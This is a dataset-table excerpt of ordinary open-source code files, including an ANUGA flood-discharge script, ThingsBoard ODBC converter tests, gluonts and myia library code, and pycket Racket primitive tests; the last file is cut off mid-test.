max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
tests/components/generic_thermostat/__init__.py | MrDelik/core | 30,023 | 11096029 | """generic_thermostat tests."""
|
vint/linting/lint_target.py | mosheavni/vint | 538 | 11096033 | <gh_stars>100-1000
from typing import Optional # noqa: F401
from pathlib import Path
from io import BufferedIOBase
class AbstractLintTarget(object):
def __init__(self, path): # type: (Path) -> None
self.path = path
def read(self): # type: () -> bytes
raise NotImplementedError()
class LintTargetFile(AbstractLintTarget):
def __init__(self, path):
# type: (Path) -> None
super(LintTargetFile, self).__init__(path)
def read(self): # type: () -> bytes
with self.path.open('rb') as f:
return f.read()
class LintTargetBufferedStream(AbstractLintTarget):
def __init__(self, alternate_path, buffered_io):
# type: (Path, BufferedIOBase) -> None
super(LintTargetBufferedStream, self).__init__(alternate_path)
self._buffered_io = buffered_io
def read(self): # type: () -> bytes
return self._buffered_io.read()
class CachedLintTarget(AbstractLintTarget):
def __init__(self, lint_target):
# type: (AbstractLintTarget) -> None
super(CachedLintTarget, self).__init__(lint_target.path)
self._target = lint_target
self._cached_bytes = None # type: Optional[bytes]
def read(self): # type: () -> bytes
if self._cached_bytes is not None:
return self._cached_bytes
result = self._target.read()
self._cached_bytes = result
return result
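# Illustrative usage sketch (hypothetical, based only on the classes above): the
# targets compose, e.g. CachedLintTarget(LintTargetFile(Path('foo.vim'))) reads
# the file once and serves subsequent read() calls from the cached bytes.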
|
examples/cairns_excel/flow_through_cross_sections.py | samcom12/anuga_core | 136 | 11096044 | <filename>examples/cairns_excel/flow_through_cross_sections.py
"""
Post-processing code to compute flux through cross-sections. The implementation
currently uses an approximate method.
The user must hard-code the polylines dictionary (defining the cross-sections) below.
See the help for 'get_approximate_discharge_timeseries' for info on how the discharge
is computed through the polylines (including how the sign is determined).
The user can either hard-code the sww_filename, knn, and desired_ds (below), or pass them
as command line arguments to the script.
This calling approach will use the hard-coded values:
> python flow_through_cross_sections.py
This calling approach will use the command line arguments [in order: the sww
filename, knn, and desired_ds]:
> python flow_through_cross_sections.py MODEL_OUTPUTS/RUN_XXXX/mysww.sww 1 500.0
<NAME>, Geoscience Australia 2014+
"""
import sys, os
import pickle
import anuga
from anuga import plot_utils as util
import scipy.spatial
import numpy
from anuga.utilities import spatialInputUtil as su
import matplotlib
# NCI hack, since interactive plotting fails there
try:
from matplotlib import pyplot as pyplot
except:
matplotlib.use('Agg')
from matplotlib import pyplot as pyplot
## USER INPUT ####
# polylines can have multiple segments
polylines = {
'Offshore': [ [666779.0, 8253357.], [673906., 8096367.], [684597., 7983715.]],
'CoastalInlet': [ [393277., 8104579.], [395059., 8095373.]]
}
# Hard-coded values, possibly overwritten by command line arguments
sww_filename = 'MODEL_OUTPUTS/RUN_20150625_110925_cairns_excel/cairns_excel.sww'
knn = 1 # How many neighbours to use for interpolation
desired_ds = 500.0 # Spacing of points along integration lines
## END USER INPUT ###
def get_approximate_discharge_timeseries(sww_filename,
polylines,
desired_ds=0.5,
k_nearest_neighbours=1,
search_mesh=True,
verbose=True):
"""Given an sww_filename and a dictionary of 1D polylines, estimate the
discharge timeseries through each polyline by interpolating the centroid
uh/vh onto evenly spaced points on the polyline (with spacing ~ desired_ds),
computing the flux normal to the line, and using the trapezoidal rule to
integrate it.
The interpolation of centroid uh/vh onto the polyline points can be either
based on 'k-nearest-neighbours', or a direct-search of the mesh triangles.
The former can be fast and allow for smoothing, while the latter is often
still fast enough, and might be more accurate.
The positive/negative discharge direction is determined from the polyline.
Consider a river channel. If the polyline begins on the left-bank and ends
on the right bank (left/right defined when facing downstream) then
discharge in the downstream direction is positive.
WARNING: The result is only approximate, because ANUGA's internal edge
fluxes are derived differently (with the Riemann solver), because the
interpolation does not follow ANUGA's, and because your transect might not
be exactly perpendicular to the flow. None of the methods give an exact
result at present.
Errors can be significant where the solution is changing rapidly. It may
be worth comparing multiple cross-sections in the vicinity of the site of
interest [covering different mesh triangles, with slightly different
orientations].
@param sww_filename name of sww file
@param polylines dictionary of polylines, e.g.
polylines = {
'Xsection1': [ [495., 1613.], [495., 1614.], [496., 1615.] ],
'Xsection2': [ [496., 1614.], [4968., 1615.] ]
}
@param desired_ds point spacing used for trapezoidal integration on
polylines
@param k_nearest_neighbours number of nearest neighbours used for
interpolation of uh/vh onto polylines
@param search_mesh If True AND k_nearest_neighbours=1, we search the
mesh vertices to find the triangle containing our point. Otherwise
do nearest-neighbours on the triangle centroids to estimate the
'nearest' triangle
@param verbose
@return a list of length 2 with the output_times as a numpy array, and a
dictionary with the flow timeseries
"""
if (search_mesh) & (k_nearest_neighbours > 1):
msg = 'k_nearest_neighbours must be 1 when search_mesh is true'
raise Exception(msg)
# 2 ways to associate transect points with triangle values
# 1) knn on centroids, or
# 2) directly search for mesh triangles containing transect points
# 1 can be faster + allows for smoothing, but 2 is usually better
use_knn = (search_mesh == False) | (k_nearest_neighbours != 1)
if use_knn:
# Centroids are used for knn
p = util.get_centroids(sww_filename, timeSlices=0)
sww_xy = numpy.vstack([p.x+p.xllcorner, p.y+p.yllcorner]).transpose()
point_index_kdtree = scipy.spatial.cKDTree(sww_xy)
else:
# Vertices are used for mesh search
p = util.get_output(sww_filename, timeSlices=0)
# To conserve memory read from netcdf directly
from anuga.file.netcdf import NetCDFFile
sww_nc = NetCDFFile(sww_filename)
ud = sww_nc.variables['xmomentum_c']
vd = sww_nc.variables['ymomentum_c']
output_times = sww_nc.variables['time'][:]
discharge_series = {}
for pk in polylines.keys():
if verbose: print pk
pl_full = polylines[pk]
for segment_num in range(len(pl_full)-1):
pl = [ pl_full[segment_num], pl_full[segment_num + 1] ]
segment_length = ( (pl[0][0] - pl[1][0])**2 +\
(pl[0][1] - pl[1][1])**2 )**0.5
# Normal vector
n1 = (pl[0][1] - pl[1][1])/segment_length
n2 = -(pl[0][0] - pl[1][0])/segment_length
# Approximate segment as npts points
npts = int(numpy.ceil( segment_length / (desired_ds) + 1.0))
gridXY = numpy.vstack([scipy.linspace(pl[0][0], pl[1][0], num=npts),
scipy.linspace(pl[0][1], pl[1][1], num=npts)]
).transpose()
# Actual distance between points
ds = (numpy.diff(gridXY[:,0])**2 + numpy.diff(gridXY[:,1])**2)**0.5
ds_trapz = numpy.hstack([ ds[0], (ds[0:-1] + ds[1:]), ds[-1]])*0.5
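# ds_trapz[i] is the trapezoidal-rule weight for point i: half the total
# length of the sub-segments adjacent to that point.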
if verbose: print 'Finding triangles containing point'
if use_knn:
point_distance, point_indices = point_index_kdtree.query(gridXY,
k = k_nearest_neighbours)
else:
gridXY_offset = gridXY*0.
gridXY_offset[:,0] = gridXY[:,0] - p.xllcorner
gridXY_offset[:,1] = gridXY[:,1] - p.yllcorner
point_indices = numpy.zeros( gridXY.shape[0]).astype(int)
# Provide the order to search the points (might be faster?)
v1 = p.vols[:,0]
search_order_update_freq = 1
for i in range(gridXY.shape[0]):
# For efficiency, we don't recompute the order to search points
# every time
if i%search_order_update_freq==0:
# Update the mesh triangle search order
first_vertex_d2 = (p.x[v1] - gridXY_offset[i,0])**2 +\
(p.y[v1] - gridXY_offset[i,1])**2
search_order = first_vertex_d2.argsort().tolist()
# Estimate how often we should update the triangle ordering
# Use "distance of point to vertex" / "point spacing"
# Crude
search_order_update_freq = \
int(numpy.ceil((first_vertex_d2[search_order[0]]**0.5)/ds[0]))
point_indices[i] =\
util.get_triangle_containing_point(p, gridXY_offset[i,:],
search_order = search_order)
if verbose: print 'Computing the flux'
if k_nearest_neighbours == 1:
point_uh = ud[:][:, point_indices]
point_vh = vd[:][:, point_indices]
else:
point_uh = numpy.zeros( (len(output_times),
len(point_indices[:,0])))
point_vh = numpy.zeros( (len(output_times),
len(point_indices[:,0])))
# Compute the inverse distance weighted uh/vh
numerator = point_uh*0.
denominator = point_uh*0.
inv_dist = 1.0/(point_distance+1.0e-12) #Avoid zero division
# uh
for k in range(k_nearest_neighbours):
ud_data = ud[:][:,point_indices[:,k]]
for ti in range(len(output_times)):
numerator[ti,:] += ud_data[ti,:]*inv_dist[:,k]
denominator[ti,:] += inv_dist[:,k]
point_uh = numerator/denominator
#vh
numerator *= 0.
denominator *= 0.
for k in range(k_nearest_neighbours):
vd_data = vd[:][:,point_indices[:,k]]
for ti in range(len(output_times)):
numerator[ti,:] += vd_data[ti,:]*inv_dist[:,k]
denominator[ti,:] += inv_dist[:,k]
point_vh = numerator/denominator
Q = [ ((point_uh[i,:]*n1 + point_vh[i,:]*n2)*ds_trapz).sum() \
for i in range(len(output_times)) ]
if segment_num == 0:
discharge_series[pk] = numpy.array(Q)
else:
discharge_series[pk] += numpy.array(Q)
return [output_times, discharge_series]
def plot_discharge_timeseries(discharge_series_in, output_times, subset=None):
"""Quick-and-dirty plot of the discharge timeseries
"""
if subset is not None:
discharge_series = discharge_series_subset(discharge_series_in, subset)
else:
discharge_series = discharge_series_in
## Plot all series
site_order = discharge_series.keys()
line_types = ['-', '-.', '--']
site_order.sort()
for i, pk in enumerate(site_order):
pyplot.plot(output_times, discharge_series[pk],
line_types[i%3], label=pk)
pyplot.legend(loc=3, fontsize='xx-small')
pyplot.plot(output_times, output_times*0.,'--',color='black')
return
def discharge_series_subset(discharge_series, river_name_pattern):
"""Make a new discharge_series dictionary from all sites which match a
pattern
"""
discharge_series_keys = discharge_series.keys()
river_keys = [ discharge_series_keys[i] \
for i in su.matchInds(river_name_pattern, discharge_series_keys) ]
new_discharge_series = {}
for rk in river_keys:
new_discharge_series[rk] = discharge_series[rk]
return new_discharge_series
###############################################################################
if __name__ == '__main__':
# Parse command line arguments
if len(sys.argv)>1:
sww_filename = sys.argv[1]
if len(sys.argv)>2:
knn = int(sys.argv[2])
if len(sys.argv) > 3:
desired_ds = float(sys.argv[3])
if knn==1:
search_mesh = True
else:
search_mesh = False
assert os.path.exists(sww_filename), 'sww_filename not found'
print 'sww_filename: ' + sww_filename
print 'knn: ' + str(knn)
print 'desired_ds: ' + str(desired_ds)
print ''
output_times, discharge_series = get_approximate_discharge_timeseries(
sww_filename, polylines, desired_ds=desired_ds,
k_nearest_neighbours=knn, search_mesh=search_mesh)
# Pickle outputs
output_pickle = os.path.join(os.path.dirname(sww_filename),
'discharge_series.pkl')
pickle.dump([output_times, discharge_series],
open(output_pickle, 'w'))
# Now write in text format
for key in discharge_series.keys():
temp_array = numpy.vstack([output_times, discharge_series[key]]).transpose()
numpy.savetxt(
(os.path.join(os.path.dirname(sww_filename), key + '.csv')),
temp_array,
delimiter=',')
# Lots of plots
#try:
# pyplot.ion()
# pyplot.figure()
# plot_discharge_timeseries(discharge_series, output_times)
# rivers = ['Offshore', 'CoastalInlet']
# for river in rivers:
# pyplot.figure()
# plot_discharge_timeseries(discharge_series, output_times, river)
# pyplot.title(river)
#except:
# print 'Interactive plotting failed (expected on NCI)'
|
test/pre_train/model_stats_perf.py | chao1412732094/tensorwatch | 3,453 | 11096053 | import copy
import tensorwatch as tw
import torchvision.models
import torch
import time
model = getattr(torchvision.models, 'densenet201')()
def model_timing(model):
st = time.time()
for _ in range(20):
batch = torch.rand([64, 3, 224, 224])
y = model(batch)
return time.time()-st
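# Rough wall-clock timing: 20 forward passes of the given model on random
# 64x3x224x224 batches (batch generation is included in the timing and
# gradients are not disabled).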
print(model_timing(model))
model_stats = tw.ModelStats(model, [1, 3, 224, 224], clone_model=False)
print(f'flops={model_stats.Flops}, parameters={model_stats.parameters}, memory={model_stats.inference_memory}')
print(model_timing(model))
|
tests/converters/test_odbc_uplink_converter.py | linxingchao/tb_gateway_with_extension | 1,123 | 11096065 | <filename>tests/converters/test_odbc_uplink_converter.py
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from random import randint, uniform, choice
from string import ascii_lowercase
from thingsboard_gateway.connectors.odbc.odbc_uplink_converter import OdbcUplinkConverter
class OdbcUplinkConverterTests(unittest.TestCase):
def setUp(self):
self.converter = OdbcUplinkConverter()
self.db_data = {"boolValue": True,
"intValue": randint(0, 256),
"floatValue": uniform(-3.1415926535, 3.1415926535),
"stringValue": "".join(choice(ascii_lowercase) for _ in range(8))}
def test_glob_matching(self):
converted_data = self.converter.convert("*", self.db_data)
self.assertDictEqual(converted_data, self.db_data)
def test_data_subset(self):
config = ["floatValue", "boolValue"]
converted_data = self.converter.convert(config, self.db_data)
expected_data = {}
for key in config:
expected_data[key] = self.db_data[key]
self.assertDictEqual(converted_data, expected_data)
def test_alias(self):
config = [{"column": "stringValue", "name": "valueOfString"}]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data[config[0]["column"]]})
def test_name_expression(self):
attr_name = "someAttribute"
config = [{"nameExpression": "key", "value": "intValue"}]
self.db_data["key"] = attr_name
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {attr_name: self.db_data[config[0]["value"]]})
def test_value_config(self):
config = [{"name": "someValue", "value": "stringValue + str(intValue)"}]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data["stringValue"] + str(self.db_data["intValue"])})
def test_one_valid_one_invalid_configs(self):
config = ["unkownColumnValue", "stringValue"]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[1]: self.db_data[config[1]]})
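# Summary of the converter configs exercised above: "*" copies every column,
# a list of column names selects a subset, {"column": ..., "name": ...} renames
# a column, {"nameExpression": ..., "value": ...} takes the key from another
# column's value, {"name": ..., "value": <expression>} evaluates an expression
# over the columns, and unknown column names are silently skipped.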
if __name__ == '__main__':
unittest.main()
|
src/gluonts/mx/distribution/bijection_output.py | Xiaoxiong-Liu/gluon-ts | 2,648 | 11096087 | <reponame>Xiaoxiong-Liu/gluon-ts<filename>src/gluonts/mx/distribution/bijection_output.py
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
from typing import Tuple
from gluonts.core.component import validated
from gluonts.mx import Tensor
from .bijection import Bijection
from .distribution_output import Output
class BijectionOutput(Output):
"""
Class to connect a network to a bijection
"""
bij_cls: type
@validated()
def __init__(self) -> None:
pass
def domain_map(self, F, *args: Tensor):
raise NotImplementedError()
def bijection(self, bij_args: Tensor) -> Bijection:
return self.bij_cls(*bij_args)
@property
def event_shape(self) -> Tuple:
raise NotImplementedError()
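# Illustrative subclass sketch (hypothetical names, based only on the interface
# above): a concrete output sets `bij_cls` to a Bijection subclass and
# implements `domain_map` and `event_shape`, e.g.
#
#   class MyBijectionOutput(BijectionOutput):
#       bij_cls = MyBijection               # hypothetical Bijection subclass
#
#       def domain_map(self, F, scale):     # map raw network outputs to bijection args
#           return (F.Activation(scale, act_type="softrelu"),)
#
#       @property
#       def event_shape(self):
#           return ()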
|
myia/operations/prim_split.py | strint/myia | 222 | 11096096 | <reponame>strint/myia<gh_stars>100-1000
"""Definitions for the primitive `split`."""
import numpy as np
from ..lib import (
SHAPE,
TYPE,
AbstractTuple,
bprop_to_grad_transform,
standard_prim,
)
from ..operations import concat, zeros_like
from . import primitives as P
def pyimpl_split(x, sections, dim):
"""Implement `split`."""
sections = tuple(np.cumsum(sections))[:-1]
return np.split(x, sections, axis=dim)
@standard_prim(P.split)
async def infer_split(self, engine, x, sections, dim):
"""Infer the return type of primitive `split`."""
sections_v = [e.xvalue() for e in sections.elements]
x_shp_v = x.xshape()
dim_v = dim.xvalue()
shp_r = ()
for s in sections_v:
shp_r = shp_r + (x_shp_v[:dim_v] + (s,) + x_shp_v[dim_v + 1 :],)
return AbstractTuple(
[
type(x)(x.element, {SHAPE: out_shape, TYPE: x.xtype()})
for out_shape in shp_r
]
)
@bprop_to_grad_transform(P.split)
def bprop_split(x, sections, dim, out, dout):
"""Backpropagator for primitive `split`."""
x_grad = concat(dout, dim)
return (x_grad, zeros_like(sections), zeros_like(dim))
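# Gradient note: the backward of `split` simply concatenates the per-piece
# output gradients back along the split dimension; `sections` and `dim` are
# integer arguments, so they receive zero gradients.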
__operation_defaults__ = {
"name": "split",
"registered_name": "split",
"mapping": P.split,
"python_implementation": pyimpl_split,
}
__primitive_defaults__ = {
"name": "split",
"registered_name": "split",
"type": "backend",
"python_implementation": pyimpl_split,
"inferrer_constructor": infer_split,
"grad_transform": bprop_split,
}
|
pycket/test/test_prims.py | namin/pycket | 129 | 11096099 | <gh_stars>100-1000
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# A place for testing primitives
#
import pytest
import os
import sys
from pycket import values
from pycket.values import w_true
from pycket.test.testhelper import check_all, check_none, check_equal, run_flo, run_fix, run, run_mod, run_mod_expr
skip = pytest.mark.skipif("True")
def test_equal():
check_all(
"(equal? 1 1)",
"(equal? 1.5 (+ 0.5 1))",
"(equal? 1+1i 1+1i)",
"(equal? 'foo 'foo)",
"(equal? '() '())",
"(equal? #f #f)",
"(equal? #t #t)",
"(equal? (cons 1 2) (cons 1 2))",
"(equal? (vector->list (make-vector 10000 5)) (vector->list (make-vector 10000 5)))",
"(equal? #() #())",
"(equal? #(1) #(1))",
"(equal? #(1 2) #(1 2))",
'(equal? "abc" "abc")',
)
check_none(
"(equal? 1 2)",
"(equal? 1 2.2)",
"(equal? 1 1.0)",
"(equal? 1+1i 1.0+0i)",
"(equal? 1+1i 1)",
"(equal? 'foo 'bar)",
"(equal? '() #f)",
"(equal? #f #t)",
"(equal? (cons 1 2) (cons 1 4))",
"(equal? (cons 2 2) (cons 1 2))",
"(equal? (cons 2 (cons 1 2)) (cons 1 (cons 1 (cons 1 6))))",
"(equal? #(1) #())",
"(equal? #(1 2 3 4 5) #(1 2 3 4 6))",
"(equal? #(1 2 3 4 5) #(1 2 3 4 'a))",
'(equal? "abc" "def")',
)
def test_equal2(doctest):
"""
! (require racket/base)
> (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/bash"))
#t
> (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/tcsh"))
#f
"""
###############################################################################
def test_append_single(doctest):
"""
> (append #f)
#f
> (append (list 1 2) (list 3 4))
'(1 2 3 4)
"""
assert doctest
def test_append_vararg(doctest):
"""
> (append (list 1 2) (list 3 4) (list 5 6) (list 7 8))
'(1 2 3 4 5 6 7 8)
"""
assert doctest
def test_for_each_single(doctest):
"""
! (require (only-in '#%kernel for-each))
> (let ([x 0])
(for-each (lambda (y)
(set! x (+ x y)))
'(1 2 3))
x)
6
"""
assert doctest
def test_for_each_vararg(doctest):
"""
! (require (only-in '#%kernel for-each))
> (let ([x 1])
(for-each (lambda (a b c)
(set! x (+ x (* a b c))))
'(1 2 3) '(4 5 6) '(7 8 9))
x)
271
"""
assert doctest
def test_map(doctest):
"""
! (require (only-in '#%kernel map))
> (map (lambda (number)
(+ 1 number))
'(1 2 3 4))
'(2 3 4 5)
> (map (lambda (number1 number2)
(+ number1 number2))
'(1 2 3 4)
'(10 100 1000 10000))
'(11 102 1003 10004)
E (map)
E (map (lambda (x) 1))
E (map (lambda (x) 1) (list 1 2) (list 2 3))
"""
assert doctest
def test_shorthands(doctest):
"""
> (caar '((1 2) 3 4))
1
> (cadr '((1 2) 3 4))
3
> (cdar '((7 6 5 4 3 2 1) 8 9))
'(6 5 4 3 2 1)
> (cddr '(2 1))
'()
> (caaar '(((6 5 4 3 2 1) 7) 8 9))
6
> (caadr '(9 (7 6 5 4 3 2 1) 8))
7
> (cadar '((7 6 5 4 3 2 1) 8 9))
6
> (caddr '(3 2 1))
1
> (cdaar '(((6 5 4 3 2 1) 7) 8 9))
'(5 4 3 2 1)
> (cdadr '(9 (7 6 5 4 3 2 1) 8))
'(6 5 4 3 2 1)
> (cddar '((7 6 5 4 3 2 1) 8 9))
'(5 4 3 2 1)
> (cdddr '(3 2 1))
'()
> (caaaar '((((5 4 3 2 1) 6) 7) 8 9))
5
> (caaadr '(9 ((6 5 4 3 2 1) 7) 8))
6
> (caadar '((7 (5 4 3 2 1) 6) 8 9))
5
> (caaddr '(9 8 (6 5 4 3 2 1) 7))
6
> (cadaar '(((6 5 4 3 2 1) 7) 8 9))
5
> (cadadr '(9 (7 6 5 4 3 2 1) 8))
6
> (caddar '((7 6 5 4 3 2 1) 8 9))
5
> (cadddr '(4 3 2 1))
1
> (cdaaar '((((5 4 3 2 1) 6) 7) 8 9))
'(4 3 2 1)
> (cdaadr '(9 ((6 5 4 3 2 1) 7) 8))
'(5 4 3 2 1)
> (cdadar '((7 (5 4 3 2 1) 6) 8 9))
'(4 3 2 1)
> (cdaddr '(9 8 (6 5 4 3 2 1) 7))
'(5 4 3 2 1)
> (cddaar '(((6 5 4 3 2 1) 7) 8 9))
'(4 3 2 1)
> (cddadr '(9 (7 6 5 4 3 2 1) 8))
'(5 4 3 2 1)
> (cdddar '((7 6 5 4 3 2 1) 8 9))
'(4 3 2 1)
> (cddddr '(4 3 2 1))
'()
"""
def test_random():
for i in range(100):
x = run_flo("(random)")
assert 0.0 <= x < 1.0
x = run_fix("(random %s)" % (5 + i))
if pytest.config.new_pycket:
assert 0 <= x.value < i + 5
else:
assert 0 <= x < i + 5
def test_random_seed():
run("(begin (random-seed 142) (let-values (((x) (random))) (random-seed 142) (= (random) x)))", w_true)
def test_byte_huh(doctest):
"""
> (byte? 65)
#t
> (byte? 0)
#t
> (byte? 256)
#f
> (byte? -1)
#f
"""
def test_make_bytes_create(doctest):
"""
> (make-bytes 5 65)
#"AAAAA"
E (make-bytes 5 11111)
> (bytes 65 112 112 108 101)
#"Apple"
> (bytes)
#""
"""
def test_make_string_create(doctest):
"""
> (make-string 5 #\A)
"AAAAA"
> (string #\A #\p #\p #\l #\e)
"Apple"
> (string)
""
"""
def test_list_to_bytes(doctest):
"""
> (list->bytes (list 65 112 112 108 101))
#"Apple"
"""
def test_bytes(doctest):
"""
> (bytes-length #"Apple")
5
> (bytes-ref #"Apple" 0)
65
> (define s (bytes 65 112 112 108 101))
> (bytes-set! s 4 121)
> s
#"Apply"
"""
def test_unsafe_bytes(doctest):
"""
! (require '#%unsafe)
> (unsafe-bytes-length #"Apple")
5
> (unsafe-bytes-ref #"Apple" 0)
65
> (define s (bytes 65 112 112 108 101))
> (unsafe-bytes-set! s 4 121)
> s
#"Apply"
"""
def test_subbytes(doctest):
"""
> (subbytes #"Apple" 1 3)
#"pp"
> (subbytes #"Apple" 1)
#"pple"
"""
def test_bytes_copy_bang(doctest):
"""
> (define s (bytes 65 112 112 108 101))
> (bytes-copy! s 4 #"y")
> (bytes-copy! s 0 s 3 4)
> s
#"lpply"
"""
def test_open_input_bytes_and_read_bytes_line(source):
"""
(let* ([b (string->bytes/utf-8 "ABC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n")]
[expected '(#"MNOP" #"" #"" #"JKL" #"" #"GHI" #"" #"DEF" #"ABC")]
[inport (open-input-bytes b)])
(let ([res (let rev ([lines null])
(let ([line (read-bytes-line inport)])
(if (eof-object? line)
lines
(rev (cons line lines)))))])
(equal? res expected)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_read_bytes(source):
"""
(let ([ip (open-input-bytes (bytes 115 101 99 114 101 116))])
(read-bytes 6 ip))
"""
result = run_mod_expr(source, wrap=True)
assert isinstance(result, values.W_Bytes)
assert result.value == list("secret")
def test_read_utf8_bytes_chars(source):
ur"""
(let* ([b "ÄÖÜ"]
[inport (open-input-string b)]
[res1 (read-byte inport)]
[res2 (read-byte inport)]
[res3 (read-char inport)]
)
(and
(equal? res1 195)
(equal? res2 132)
(equal? res3 #\Ö)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_open_input_and_read_line(source):
u"""
(let* ([b "ÄBC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n"]
[expected '("MNOP" "" "" "JKL" "" "GHI" "" "DEF" "ÄBC")]
[inport (open-input-string b)])
(let ([res (let rev ([lines null])
(let ([line (read-line inport)])
(if (eof-object? line)
lines
(rev (cons line lines)))))])
(equal? res expected)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_bytes_port(doctest):
r"""
;> (define op1 (open-output-bytes))
;> (write '((1 2 3) ("Tom" "Dick") ('a 'b 'c)) op1)
;> (get-output-bytes op1)
; #"((1 2 3) (\"Tom\" \"Dick\") ((quote a) (quote b) (quote c)))"
;> (define op2 (open-output-bytes))
;> (write "Hi " op2)
;> (write "there" op2)
;> (get-output-bytes op2)
; #"\"Hi \"\"there\""
! (define op3 (open-output-bytes))
> (write-bytes #"Hi " op3)
3
> (display #"there" op3)
> (get-output-bytes op3)
#"Hi there"
"""
####################
def test_procedure_arity(doctest):
"""
! (require racket/private/norm-arity)
> (procedure-arity cons)
2
> (procedure-arity list)
(arity-at-least 0)
> (arity-at-least? (procedure-arity list))
#t
> (arity-at-least-value (procedure-arity list))
0
> (arity-at-least-value (procedure-arity (lambda (x . y) x)))
1
> (procedure-arity (case-lambda [(x) 0] [(x y) 1]))
'(1 2)
"""
def test_procedure_arity_includes(doctest):
"""
! (require racket/private/kw)
> (procedure-arity-includes? cons 2)
#t
> (procedure-arity-includes? display 3)
#f
> (procedure-arity-includes? (lambda (x #:y y) x) 1)
#f
> (procedure-arity-includes? (lambda (x #:y y) x) 1 #t)
#t
"""
#############################################################################
def test_system_type_os(source):
"""(cons (system-type) (system-type 'os))"""
result = run_mod_expr(source, wrap=True)
assert result.car() == result.cdr()
sym = result.car().asciivalue()
# Sadly, this can never cover all cases.
if sys.platform == "darwin":
assert sym == "macosx"
elif sys.platform in ['win32', 'cygwin']:
assert sym == "windows"
else:
assert sym == "unix"
def test_system_path_convention_type(source):
"""(system-path-convention-type)"""
result = run_mod_expr(source, wrap=True)
sym = result.asciivalue()
if sys.platform in ['win32', 'cygwin']:
assert sym == "windows"
else:
assert sym == "unix"
@pytest.mark.skip(reason="will be solved when tostring is not 'write'")
def test_number_to_string(doctest):
"""
> (number->string 10)
"10"
> (number->string -10)
"-10"
> (number->string -1.1)
"-1.1"
> (number->string -5.5)
"-5.5"
> (number->string -17+1i)
"-17+1i"
> (number->string -5/6)
"-5/6"
> (number->string 1 16)
"1"
> (number->string 10 16)
"a"
> (number->string 111 16)
"6f"
E (number->string 111 -164)
> (number->string -164 16)
"-a4"
E (number->string -164.3 16)
;> (number->string -4/5 16)
;"-4/5"
;> (number->string -4/12311 16)
;"-4/3017"
> (number->string 111111111111111111111111111111111111111111111111111111111111111111111111111111111 16)
"3bf9304450677dc5f60e4afde2a26b6546f195ed670022bc71c71c71c71c71c71c7"
"""
def test_list_to_string(doctest):
r"""
> (list->string (list #\A #\p #\p #\l #\e))
"Apple"
"""
def test_char_cmp_huh(doctest):
r"""
> (char=? #\a #\a)
#t
> (char=? #\a #\A #\a)
#f
> (char<? #\A #\a)
#t
> (char<? #\a #\A)
#f
> (char<? #\a #\b #\c)
#t
> (char<=? #\A #\a)
#t
> (char<=? #\a #\A)
#f
> (char<=? #\a #\b #\b)
#t
> (char>? #\A #\a)
#f
> (char>? #\a #\A)
#t
> (char>? #\c #\b #\a)
#t
> (char>=? #\A #\a)
#f
> (char>=? #\a #\A)
#t
> (char>=? #\c #\b #\b)
#t
> (char-ci=? #\A #\a)
#t
> (char-ci=? #\a #\a #\a)
#t
> (char-ci<? #\A #\a)
#f
> (char-ci<? #\a #\b)
#t
> (char-ci<? #\a #\b #\c)
#t
> (char-ci<=? #\A #\a)
#t
> (char-ci<=? #\a #\A)
#t
> (char-ci<=? #\a #\b #\b)
#t
> (char-ci>? #\A #\a)
#f
> (char-ci>? #\b #\A)
#t
> (char-ci>? #\c #\b #\a)
#t
> (char-ci>=? #\A #\a)
#t
> (char-ci>=? #\a #\A)
#t
> (char-ci>=? #\c #\b #\b)
#t
"""
def test_char_prop_huh(doctest):
r"""
> (char-alphabetic? #\a)
#t
> (char-alphabetic? #\=)
#f
> (char-numeric? #\0)
#t
> (char-numeric? #\=)
#f
> (char-whitespace? #\tab)
#t
> (char-whitespace? #\=)
#f
"""
def test_gcd_lcm(doctest):
"""
> (gcd 10)
10
> (gcd 12 81.0)
3.0
> (gcd 1/2 1/3)
1/6
> (lcm 10)
10
> (lcm 3 4.0)
12.0
> (lcm 1/2 2/3)
2
"""
def test_read(doctest):
"""
! (define (rs s) (read (open-input-string s)))
> (rs "1")
1
> (rs "#t")
#t
> (rs "abc")
'abc
> (define s (open-input-string "1 #t abc"))
> (read s)
1
> (read s)
#t
> (read s)
'abc
> (rs "()")
'()
> (rs "(1)")
'(1)
> (rs "(1 2 3 a b c)")
'(1 2 3 a b c)
> (rs "(1 (2 3) (a (b c)))")
'(1 (2 3) (a (b c)))
> (rs "[]")
'[]
> (rs "[]")
'()
> (rs "[1]")
'[1]
> (rs "[1 2 3 a b c]")
'[1 2 3 a b c]
> (rs "[1 [2 3] [a [b c]]]")
'[1 [2 3] [a [b c]]]
> (rs "(1 . 2)")
(cons 1 2)
> (rs "(a . b)")
(cons 'a 'b)
> (rs "(a.b . c.d)")
(cons 'a.b 'c.d)
> (rs "...")
'...
> (rs "'(1)")
''(1)
> (rs "`(1)")
